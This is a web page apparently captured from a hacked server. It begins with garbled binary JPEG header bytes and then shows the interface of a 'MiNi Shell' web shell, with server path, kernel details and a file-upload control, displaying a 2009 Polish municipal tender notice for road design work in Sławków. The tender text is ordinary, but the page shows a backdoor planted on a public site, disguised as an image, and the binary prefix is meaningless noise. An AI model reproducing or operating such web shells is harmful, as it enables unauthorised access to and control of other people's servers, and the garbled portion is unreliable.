JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090310/47683-N-2009.html

<p class="kh_header"><b>Sławków: Opracowanie dokumentacji technicznej na zadanie pn.: Budowa odcinka nowej drogi w rejonie ul. Grodzkiej</b><br>
<b>Numer ogłoszenia: 47683 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Sławkowa , ul. Rynek 1, 41-260 Sławków, woj. śląskie, tel. 032 2931552 w. 41, faks 032 2931233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slawkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji technicznej na zadanie pn.: Budowa odcinka nowej drogi w rejonie ul. Grodzkiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji technicznej budowy nowej drogi - ulicy dojazdowej z włączeniem od ul. Grodzkiej przy cmentarzu pkt.A na mapie - wyrys z planu do wyjazdu przy ul. Grodzkiej pkt. C na wyrysie z planu wraz z miejscem do zawracania - pkt. B 

Zakres i forma dokumentacji projektowej:
-zgodnie z miejscowym planem zagospodarowania przestrzennego miasta Sławkowa, dla obszaru Śródmieście, zatwierdzonego uchwałą Rady Miejskiej nr L/339/06 dla terenu ulicy Grodzkiej (tereny dróg publicznych, ulica dojazdowa 1.KD-D). 
-szczegółowy wypis z planu zagospodarowania przestrzennego miasta Sławkowa stanowi załącznik do SIWZ.
-dokumentacja projektowa, służąca do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których jest wymagane pozwolenie na budowę zgodnie z przepisami ustawy z dnia 7 lipca 1994r. - Prawo budowlane, powinna zawierać w szczególności :
-projekt budowlany w zakresie uwzględniającym specyfikę robót budowlanych - 4 szt.,
-projekt wykonawczy, który powinien uzupełniać i uszczegóławiać projekt budowlany w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez wykonawcę i realizacji robót budowlanych - 4 szt.,
-przedmiar robót, który musi zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem  i zestawieniem jednostek przedmiarowych robót podstawowych - 2 szt.
-informacje dotyczące bezpieczeństwa i ochrony zdrowia - 2 szt.,
-projekt zmiany organizacji ruchu w czasie realizacji robót budowlanych uzgodniony i zatwierdzony przez właściwe jednostki - 2 szt.,
-kosztorys inwestorski projektowanego zadania,
-dokumentacja winna być uzgodniona z wszystkimi jednostkami ,
-aktualizacja mapy do celów projektowych w zakresie opracowania dokumentacji,
-wersja elektroniczna dokumentacji (pliki PDF lub DWF)
-dokumentacja musi spełniać wymagania ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz.U. z 2008r. Nr 193, poz. 1194 ze zmianami).
zakres i forma specyfikacji technicznej wykonania i odbioru robót budowlanych:

-specyfikacja techniczna wykonania i odbioru robót budowlanych stanowi opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu                 i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót
-specyfikacja techniczna wykonania i odbioru robót budowlanych musi zawierać co najmniej :
-	część ogólną - według przepisów Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. Nr 202 poz. 2072)
-	wymagania dotyczące właściwości wyrobów budowlanych oraz niezbędne wymagania związane z ich przechowywaniem, transportem, warunkami dostawy, składowaniem i kontrolą jakości,
-	wymagania dotyczące sprzętu i maszyn niezbędnych lub zalecanych do wykonania robót budowlanych zgodnie z założoną jakością,
-	wymagania dotyczące środków transportu,
-	wymagania dotyczące wykonania robót budowlanych z podaniem sposobu wykończenia poszczególnych elementów, tolerancji wymiarowych, szczegółów technologicznych oraz niezbędne informacje dotyczące odcinków robót budowlanych, przerw i ograniczeń, a także wymagania specjalne,
-	opis działań związanych z kontrolą, badaniami oraz odbiorem wyrobów i robót budowlanych              w nawiązaniu do dokumentów odniesienia,
-	wymagania dotyczące przedmiaru i obmiaru robót,
-	opis sposobu odbioru robót budowlanych,
-	opis sposobu rozliczenia robót tymczasowych i prac towarzyszących niezbędnych do wykonania robót podstawowych, a nie zaliczonych do robót tymczasowych, w tym geodezyjne wytyczanie  i inwentaryzacja powykonawcza,
-	dokumenty odniesienia - dokumenty będące podstawą do wykonania robót budowlanych w tym wszystkie elementy dokumentacji projektowej, normy, aprobaty techniczne oraz inne dokumenty i ustalenia techniczne,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.40.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
1.1.Posiadają uprawnienia do wykonywania prac projektowych będących przedmiotem niniejszego postępowania. W celu potwierdzenia ww. warunku należy przedstawić dokument, o którym mowa w pkt 2 rozdziału VI SIWZ.
1.2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym                      i osobami zdolnymi do wykonania zamówienia w zakresie prac projektowych będących przedmiotem niniejszego postępowania :
a)	wykonali co najmniej 5 prac projektowych odpowiadających swoim rodzajem i wartością pracom stanowiącym przedmiot zamówienia - w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że prace te zostały wykonane należycie.
W celu potwierdzenia ww. warunku należy przedstawić dokument, o którym mowa w pkt 3 rozdziału VI SIWZ,
b)	dysponują osobami zdolnymi do wykonania niniejszego zamówienia (geodeta, projektant                    z uprawnieniami do projektowania dróg, osoba z uprawnieniami w zakresie inżynierii ruchu drogowego, kosztorysant). W celu potwierdzenia ww. warunku należy przedstawić dokument,               o którym mowa w pkt 4 rozdziału VI SIWZ,
1.3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
W celu potwierdzenia ww. warunku należy przedstawić dokument, o którym mowa w pkt 5 rozdziału VI SIWZ.
1.4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. na podstawie                          art. 24 ustawy.
W celu potwierdzenia ww. warunku należy przedstawić dokumenty, o których mowa w pkt 6 rozdziału VI SIWZ.
Ocena spełnienia ww. warunków przez Wykonawcę dokonana zostanie w oparciu o zapisy zawarte w załącznikach oraz dokumentach zgodnie z wymogami rozdziału VI SIWZ na zasadzie spełnia - niespełnia.
Nie spełnienie przez Wykonawcę chociażby jednego z powyższych warunków Zamawiającego spowoduje obligatoryjne wykluczenie Wykonawcy z niniejszego postępowania o zamówienie publiczne zgodnie z art. 24 ust.1 pkt. 10 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca wraz z ofertą ma złożyć wymagane oświadczenia i dokumenty:
1. Wypełniony formularz oferty na załączniku nr 1.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument winien potwierdzać, że profil działalności Wykonawcy odpowiada przedmiotowi niniejszego zamówienia. 
Zgodnie z art. 23 ustawy Prawo zamówień publicznych wykonawcy ubiegający się wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3. Wykaz wykonanych prac projektowych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością pracom stanowiącym przedmiot niniejszego zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania - zgodnie z załącznikiem nr 3 do SIWZ oraz z załączeniem dokumentów (referencji przypisanych do wskazanych zamówień) potwierdzających, że prace te zostały wykonane należycie, które stanowić będą odpowiednio: załączniki nr 3.1, 3.2,...  itd. 
Zamawiający wymaga potwierdzenia realizacji przynajmniej 5 prac projektowych w zakresie opracowania dokumentacji technicznych branży drogowej.             	
4. Informacja o zatrudnieniu - w tym celu należy przedstawić zestawienie przeciętnej liczby osób zaangażowanych lub proponowanych do wykonania zamówienia, z podaniem ilości osób przewidzianych do realizacji zamówienia, posiadanymi uprawnieniami i przynależność do odpowiedniej izby gospodarczej. 
Wszystkie dokumenty potwierdzające posiadanie wymaganych uprawnień winny być załączone do wykazu (załącznik nr 4 do SIWZ). 
5. Dane finansowe.
Należy złożyć:
5.1. oświadczenie zgodnie z art. 22 ust.1 pkt 1- 3 ustwawy Prawo zamówień publicznych - według załącznika nr 5 do SIWZ.
5.2. polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności - stanowiącą (y) załącznik do oferty.
6. oświadczenie Wykonawcy w trybie art. 24 ustawy Prawo zamówień publicznych na formularzu stanowiącym załącznik nr 6 do niniejszej SIWZ.
7. oświadczenie o akceptacji treści wzoru umowy na wykonanie projektu oraz wymagań               i praw jakie sobie zastrzegł Zamawiający w SIWZ wg wzoru - załącznik nr 7 do SIWZ wraz              z parafowanym załączonym wzorem umowy. 
8.wykaz podwykonawców (nazwa i adres oraz zakres realizowanych robót) - zgodnie                   z załącznikiem nr 2 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Termin - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.umslawkow.finn.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Sławkowa
ul. Łosińska 1
41-260 Sławków
pok.25.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 10:00, miejsce: Urząd Miasta Sławkowa
Rynek 1
41-260 Sławków
I pietro sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com